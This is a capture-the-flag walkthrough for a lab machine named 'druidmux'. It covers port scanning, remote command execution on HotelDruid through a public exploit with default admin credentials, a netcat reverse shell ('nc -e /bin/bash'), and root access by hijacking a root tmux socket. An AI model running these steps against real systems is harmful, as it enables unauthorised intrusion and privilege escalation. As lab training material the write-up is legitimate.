druidmux

#### By b13ss3d ####

There's also a video version available if you prefer visual walkthroughs.

Port Scanning

We begin our reconnaissance by performing a port scan using Rustscan to identify open ports on the target system.

❯ rustscan -a 10.0.160.67
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

<SNIP>
Open 10.0.160.67:80

After identifying the open ports, we use Nmap to gather more detailed information about the services and their versions running on these ports.

nmap -p80 -sCV -n -Pn -v 10.0.160.67 -oN scan
<SNIP>
Nmap scan report for 10.0.160.67
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.25 (Debian)

Nmap command options explained:

• -p <ports>: scan only a specific port.

• -sCV: combines the options -sC and -sV.

• -sC: equivalent to --script=default.

• -sV: Probe open ports to determine service/version info.

• -n: Never do DNS resolution.

• -vvv: Increase verbosity level.

• -oN <file>: Output scan in normal format.

The scan reveals a web server running on port 80. Let's investigate the website's content using a web browser:

Gaining Initial Access

Using searchsploit, we discover several exploits for this software. One of them allows for remote command execution:

Let's copy this exploit to our current directory:

❯ searchsploit -m 50754

Now, we'll execute the exploit using default credentials:

❯ python3 50754.py -t http://10.0.160.67/hoteldruid/ -u admin -p admin

After successful execution, we gain the ability to run commands on the target system:

To improve our access, let's obtain a reverse shell. First, set up a listener using netcat:

❯ nc -nlvp 443
listening on [any] 443 ...

Then, execute the following command on the target to establish a reverse shell connection nc -e /bin/bash <your IP> <your PORT> like this:

You should receive a connection immediately:

To upgrade this basic shell to a fully interactive terminal, follow these steps:

1. Execute: script /dev/null -qc bash

2. Press CTRL + Z

3. Run: stty raw -echo;fg

4. Finally, execute: reset xterm and press Enter

Privilege escalation

List the running processes with the command ps -feaw:

We notice that root is executing tmux with the following command: tmux -S /tmp/shareds new -d -s shared /bin/bash -l Let's break down this command:

1. tmux: The base command to start tmux.

2. -S /tmp/shareds: Specifies the socket location. In this case, it uses a custom socket in /tmp/shareds instead of the default socket.

3. new: Indicates that a new session will be created.

4. -d: This option starts the new session in "detached" mode. This means the session is created but you're not immediately attached to it.

5. -s shared: Assigns a name to the session. In this case, the session will be called "shared".

6. /bin/bash -l: This is the command that will run in the new session. In this case, it starts a bash shell with the -l option, which makes it behave like a login shell.

We can exploit this configuration to escalate our privileges. For more information on this technique, refer to the HackTricks resource on tmux session hijacking.

To gain root access, simply create a new session using the socket utilized by root:

tmux -S /tmp/shareds

And voila! We now have root privileges:

Flag Locations

The flags can be found in the following locations:

• /root

• /etc/passwd

• /etc/shadow

• /proc/1/environ

• http://druidmux/ETSCTF.html